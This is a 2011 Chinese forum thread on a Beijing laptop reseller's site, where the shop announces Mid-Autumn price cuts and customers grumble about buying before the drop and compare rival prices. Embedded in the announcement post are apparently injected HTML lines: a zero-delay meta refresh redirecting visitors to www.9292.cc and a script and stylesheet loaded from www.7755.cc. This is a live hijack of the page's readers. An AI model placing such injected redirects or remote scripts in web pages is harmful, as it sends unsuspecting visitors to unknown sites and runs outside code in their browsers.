开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

中秋佳节,搞什么活动都不如降价来的开心

关闭 [复制链接]
价格普降,几乎高端机型都有超过400的降幅,热卖机型也有100左右的降幅,降价的机型很普遍,中秋佳节直接让利来的最实惠。也祝愿各位翔友们中秋快乐!

http://www.xynbnb.com/thread-59375-1-1.html

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

刚买的一周就降了100
力度不大啊
有力度。。。。
chaochaohan 发表于 2011-9-10 20:05
刚买的一周就降了100

淡定淡定
我看中的那款一分没降
我看中的那款降到9400就好了。。。
chaochaohan 发表于 2011-9-10 20:05
刚买的一周就降了100

你妹的,我降了400了,我想死去了,你诈唬啥啊

太搞笑了。。。  发表于 2011-9-12 19:11
坑爹啊~~~哈哈 要笑屎了~~~  发表于 2011-9-11 11:46
淡定淡定。。。  发表于 2011-9-10 22:59
我看中的那款,一个月内价格都没什么变化,好像是小降了100
这个给力啊
配件降价么?兄弟们好多都买了机器了,配件给降价,让大家能更新下撒~~
中秋过后是国庆  国庆应该举国同庆···老大同庆吧·······来个给力大降价
yunwai 发表于 2011-9-11 11:55
中秋过后是国庆  国庆应该举国同庆···老大同庆吧·······来个给力大降价 ...

我买的T420S,I7那款国庆应该可以降到9000了,别家都已经是这个价格了。我就说学生机肯定要降的啊,太信任翔意了,买之前别家的价格都没有查,这次真是被坑了。希望下次买机器,能给点差价补偿。痛苦中
标记一下,别家8400,这里8700
贵三百可以接受,只要保修方便
但是同样是水货,某些机器比51贵1000,就比较难接受了
这次我可能要叛变了。。。。
malde 发表于 2011-9-11 15:27
贵三百可以接受,只要保修方便
但是同样是水货,某些机器比51贵1000,就比较难接受了 ...

兄弟说的真实在,我被坑了1200

在回事  发表于 2011-9-11 16:41
哎,现在大家都困惑了~~~
我们不想做纯低价的恶意竞争,我们是销售自己真正喜欢的东西的公司。一台高端电脑不到200的利润的市场是畸形的,而且水货机器情况特殊,不像行货一样卖出去就完事,还要负责一年保修。中关村就是这么做死的,由于利润太低费用又高,只能靠其他方面想办法生存,最后做到没有诚信,产品质量和价格都没有保证。如果大家都恶性竞争做下去,鱼龙混杂,质量和售后都有危机,我想肯定越来越多的人也不会再考虑这么物廉价美的水货ThinkPad了。

我们不想走中关村的老路。其他地方我了解的不多,翔意的价格在北京算是中间档次的。T420s比我们便宜200以上的公司除了大家上述的那家我确实没看到了。而且我可以随便列举出很多这款机器比我们卖的贵的公司。

大家如果趋向于低价也没关系,就算在别家购买,也欢迎来翔意来交流。
恩不错啊啊
进货量大,就便宜~~~~
我也是降了400.....6号买的,,,当时本来想中秋后到店购买

结果急着拿机子,就网购了,亏死了

冲动是魔鬼  发表于 2011-9-12 19:38
gaogao_1982 发表于 2011-9-10 22:36
你妹的,我降了400了,我想死去了,你诈唬啥啊

哥们咱们俩买的同一型号
早买早享用~~~
强烈要求XY,让我和上面的兄弟也一块快乐快乐